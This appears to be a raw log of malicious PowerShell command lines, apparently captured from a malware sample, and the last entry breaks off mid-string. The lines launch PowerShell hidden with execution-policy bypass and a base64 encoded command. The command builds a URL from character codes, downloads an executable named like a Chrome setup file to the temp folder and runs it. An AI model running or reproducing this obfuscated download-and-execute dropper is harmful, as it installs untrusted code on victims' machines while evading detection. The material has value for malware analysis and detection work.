QAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAGgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABhAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANgA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADQAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADgAMwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAyACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADIAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACkAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAtAE8AVQB0AGYAaQBsAGUAIAAgACAAIAAgACAAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0gIAAJAAkACQAJAAkACQAJAAkACQAJAAkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABzAFQAYQByAHQAIAAgACAAIAAgACAAHSAkAGUAbgB2ADoAVABlAG0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0g
cmdline "C:\Windows\SYSTeM32\winDOWsPoWersheLL\v1.0\poWeRshElL.exe" "PowErShell -ex BypAsS -nop -W 1 -ec IAAJAAkAIAAJAAkAIABbAG4ARQB0AC4AcwBlAFIAdgBpAEMAZQBwAE8AaQBuAFQAbQBhAG4AQQBHAGUAUgBdADoAOgBTAGUAQwBVAHIASQB0AFkAUAByAG8AdABPAGMATwBsACAACQAJAAkACQAJAAkACQAJAAkACQAJAD0AIAAgACAAIAAgACAAIAAgAFsATgBlAHQALgBzAGUAYwBVAFIAaQB0AHkAcABSAE8AVABPAEMAbwBMAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACAAIAAgACAAIAAgADsAIAAgACAAIAAgACAAIAAJACAACQAgAAkACQAJAAkAIAAgAAkAIAAJAAkAIABXAGcAZQBUACAAIAAgACAAIAAgACAAIAAgACAAKABbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAOAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAGgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABhAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANgA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADQAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADgAMwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAyACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADIAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACkAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAtAE8AVQB0AGYAaQBsAGUAIAAgACAAIAAgACAAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0gIAAJAAkACQAJAAkACQAJAAkACQAJAAkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABzAFQAYQByAHQAIAAgACAAIAAgACAAHSAkAGUAbgB2ADoAVABlAG0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0g "
cmdline C:\Windows\System32\winDOWsPoWersheLL\v1.0\poWeRshElL.exe "PowErShell -ex BypAsS -nop -W 1 -ec IAAJAAkAIAAJAAkAIABbAG4ARQB0AC4AcwBlAFIAdgBpAEMAZQBwAE8AaQBuAFQAbQBhAG4AQQBHAGUAUgBdADoAOgBTAGUAQwBVAHIASQB0AFkAUAByAG8AdABPAGMATwBsACAACQAJAAkACQAJAAkACQAJAAkACQAJAD0AIAAgACAAIAAgACAAIAAgAFsATgBlAHQALgBzAGUAYwBVAFIAaQB0AHkAcABSAE8AVABPAEMAbwBMAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACAAIAAgACAAIAAgADsAIAAgACAAIAAgACAAIAAJACAACQAgAAkACQAJAAkAIAAgAAkAIAAJAAkAIABXAGcAZQBUACAAIAAgACAAIAAgACAAIAAgACAAKABbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAOAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEE